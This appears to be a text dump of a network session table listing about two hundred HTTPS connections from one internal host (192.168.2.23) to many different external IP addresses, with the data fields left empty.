                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12406192.168.2.234866424.98.25.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12407192.168.2.236032018.149.90.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12408192.168.2.234790299.112.226.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12409192.168.2.2342210211.225.112.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12410192.168.2.235691050.25.65.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12411192.168.2.2357268212.168.62.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12412192.168.2.2346756134.196.50.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12413192.168.2.2355148141.192.17.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12414192.168.2.234474267.93.242.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12415192.168.2.2345642170.26.96.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12416192.168.2.233843641.68.26.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12417192.168.2.2351258160.22.85.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12418192.168.2.234247688.49.120.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12419192.168.2.2344994132.147.82.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12420192.168.2.2343378151.104.126.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12421192.168.2.2355666131.230.139.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12422192.168.2.234005262.136.157.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12423192.168.2.2335358129.170.197.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12424192.168.2.2334528158.122.9.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12425192.168.2.234154239.29.237.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12426192.168.2.2360024220.183.64.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12427192.168.2.2344538216.12.91.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12428192.168.2.2349478173.189.143.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12429192.168.2.233462288.140.209.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12430192.168.2.2349988128.95.195.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12431192.168.2.2351394202.99.131.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12432192.168.2.2333080222.158.107.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12433192.168.2.2341984146.152.125.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12434192.168.2.2352612177.153.161.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12435192.168.2.2345514182.160.194.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12436192.168.2.2352816103.232.12.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12437192.168.2.2360050189.213.96.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12438192.168.2.2341468144.41.26.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12439192.168.2.233581061.75.195.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12440192.168.2.235226482.97.110.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12441192.168.2.2348960180.147.4.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12442192.168.2.234276890.183.194.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12443192.168.2.2338326144.251.161.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12444192.168.2.2344404114.250.53.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12445192.168.2.2347694110.182.4.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12446192.168.2.2358942103.173.248.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12447192.168.2.234658098.232.49.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12448192.168.2.235528240.248.0.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12449192.168.2.234288879.233.102.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12450192.168.2.2358868204.131.176.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12451192.168.2.2347038115.113.12.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12452192.168.2.2344814211.132.74.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12453192.168.2.235476269.253.1.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12454192.168.2.2341260208.208.162.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12455192.168.2.2348636144.70.51.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12456192.168.2.2335456120.141.173.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12457192.168.2.2344542205.113.98.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12458192.168.2.2343958177.167.220.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12459192.168.2.2342874223.226.150.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12460192.168.2.2339602169.41.123.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12461192.168.2.2349708117.199.154.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12462192.168.2.235541447.95.174.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12463192.168.2.2355598203.82.116.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12464192.168.2.2334188150.43.57.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12465192.168.2.2336778140.31.47.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12466192.168.2.234857034.189.127.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12467192.168.2.235393654.4.32.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12468192.168.2.233882871.17.167.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12469192.168.2.234890245.77.72.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12470192.168.2.235265817.174.74.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12471192.168.2.2334606148.233.5.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12472192.168.2.235462091.226.104.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12473192.168.2.234044632.58.147.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12474192.168.2.235705849.23.231.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12475192.168.2.2341120101.222.212.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12476192.168.2.2350296193.237.146.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12477192.168.2.235867847.163.162.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12478192.168.2.234068882.79.182.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12479192.168.2.233837031.159.12.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12480192.168.2.235023293.252.155.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12481192.168.2.235611635.21.107.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12482192.168.2.235452081.13.52.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12483192.168.2.2340898103.222.32.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12484192.168.2.2343876101.158.163.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12485192.168.2.2338686107.213.175.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12486192.168.2.2340798125.5.97.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12487192.168.2.235644044.98.157.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12488192.168.2.2339158142.20.167.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12489192.168.2.233394624.82.86.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12490192.168.2.23567189.16.137.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12491192.168.2.234862483.212.139.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12492192.168.2.2351646190.152.182.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12493192.168.2.233940897.245.121.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12494192.168.2.2350170191.25.35.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12495192.168.2.2346946108.186.39.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12496192.168.2.233878825.124.189.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12497192.168.2.236085878.247.72.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12498192.168.2.23359822.23.18.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12499192.168.2.233804032.68.42.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12500192.168.2.234027875.164.246.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12501192.168.2.2360080154.207.172.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12502192.168.2.235065090.136.46.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12503192.168.2.2350292103.229.23.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12504192.168.2.2349982134.25.250.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12505192.168.2.2345690107.4.135.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12506192.168.2.2355022222.18.116.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12507192.168.2.2342652126.186.6.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12508192.168.2.234423870.163.39.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12509192.168.2.2345638190.240.103.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12510192.168.2.2348738170.104.83.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12511192.168.2.233815818.210.31.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12512192.168.2.235053666.207.166.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12513192.168.2.2357264154.35.221.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12514192.168.2.2353492146.179.158.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12515192.168.2.2359578133.8.131.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12516192.168.2.2359784209.19.179.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12517192.168.2.235571871.224.102.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12518192.168.2.234314464.252.184.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12519192.168.2.233827034.203.91.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12520192.168.2.235166445.172.120.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12521192.168.2.2360648212.101.192.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12522192.168.2.2342936192.143.112.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12523192.168.2.2334992221.75.149.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12524192.168.2.2355548159.140.8.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12525192.168.2.2358776159.176.197.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12526192.168.2.2341196152.238.154.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12527192.168.2.2350632132.40.197.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12528192.168.2.2350928114.12.193.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12529192.168.2.2354498175.230.135.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12530192.168.2.2354442162.120.9.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12531192.168.2.234767043.197.83.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12532192.168.2.2357254211.226.90.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12533192.168.2.2359640131.60.8.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12534192.168.2.23424545.230.180.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12535192.168.2.2350052165.250.106.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12536192.168.2.234801096.135.28.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12537192.168.2.2356824161.54.61.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12538192.168.2.2351608108.53.247.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12539192.168.2.2354252143.34.232.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12540192.168.2.233345260.72.224.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12541192.168.2.2355642143.22.23.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12542192.168.2.235120280.243.149.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12543192.168.2.2360764156.243.140.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12544192.168.2.234263281.84.106.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12545192.168.2.234733882.118.14.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12546192.168.2.235016617.155.156.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12547192.168.2.2334676178.13.217.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12548192.168.2.2336250156.8.65.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12549192.168.2.2357540191.121.83.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12550192.168.2.2335404222.1.118.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12551192.168.2.234663084.169.173.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12552192.168.2.2345226176.72.104.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12553192.168.2.2343416204.121.187.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12554192.168.2.2353728126.108.209.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12555192.168.2.2341368124.232.139.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12556192.168.2.2355396194.134.112.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12557192.168.2.2341906183.245.174.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12558192.168.2.233471657.46.50.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12559192.168.2.2357430132.153.76.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12560192.168.2.233534438.164.131.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12561192.168.2.2336012145.208.0.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12562192.168.2.234239857.6.114.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12563192.168.2.234034285.220.65.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12564192.168.2.233675443.16.46.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12565192.168.2.2338442135.118.223.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12566192.168.2.233413225.123.164.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12567192.168.2.235590654.171.48.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12568192.168.2.2360602152.183.154.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12569192.168.2.234356661.168.59.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12570192.168.2.235313218.123.226.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12571192.168.2.233337677.74.221.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12572192.168.2.2335342154.114.235.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12573192.168.2.2360032177.164.142.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12574192.168.2.234417461.1.135.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12575192.168.2.2352144184.207.179.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12576192.168.2.2348262169.17.135.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12577192.168.2.2341740192.84.108.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12578192.168.2.234146840.92.9.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12579192.168.2.2349454117.37.123.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12580192.168.2.2352558160.201.46.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12581192.168.2.2344988146.6.174.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12582192.168.2.2336114149.26.51.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12583192.168.2.2338518197.235.109.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12584192.168.2.235651068.211.64.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12585192.168.2.2347662129.52.255.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12586192.168.2.2335364178.187.205.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12587192.168.2.233427624.68.11.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12588192.168.2.2341734172.14.168.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12589192.168.2.234919618.112.22.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12590192.168.2.2336082213.24.131.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12591192.168.2.2347144159.108.28.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12592192.168.2.2335970128.144.57.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12593192.168.2.233555824.16.7.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12594192.168.2.2335720103.167.93.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12595192.168.2.235610657.96.102.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12596192.168.2.234859814.41.52.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12597192.168.2.2342630120.56.145.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12598192.168.2.2354978205.126.203.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12599192.168.2.2348278203.240.193.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12600192.168.2.2350406131.247.181.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12601192.168.2.2352024105.241.28.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12602192.168.2.2336732212.253.254.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12603192.168.2.2358286203.126.255.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12604192.168.2.234695213.184.128.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12605192.168.2.23543044.72.136.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12606192.168.2.233477482.15.189.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12607192.168.2.2358994179.254.174.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12608192.168.2.234810069.75.185.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12609192.168.2.236001850.20.158.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12610192.168.2.233771254.187.0.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12611192.168.2.2347640109.159.180.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12612192.168.2.233883481.80.137.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12613192.168.2.2345760196.213.151.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12614192.168.2.236008636.170.212.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12615192.168.2.2347634156.17.249.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12616192.168.2.233505071.195.81.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12617192.168.2.2332778217.115.51.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12618192.168.2.233864861.3.2.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12619192.168.2.2337538106.15.173.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12620192.168.2.235923436.198.80.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12621192.168.2.235933817.77.151.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12622192.168.2.234475419.54.43.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12623192.168.2.234939427.18.8.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12624192.168.2.2340694103.24.177.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12625192.168.2.234965050.138.6.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12626192.168.2.23559885.44.62.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12627192.168.2.234136881.124.21.255443
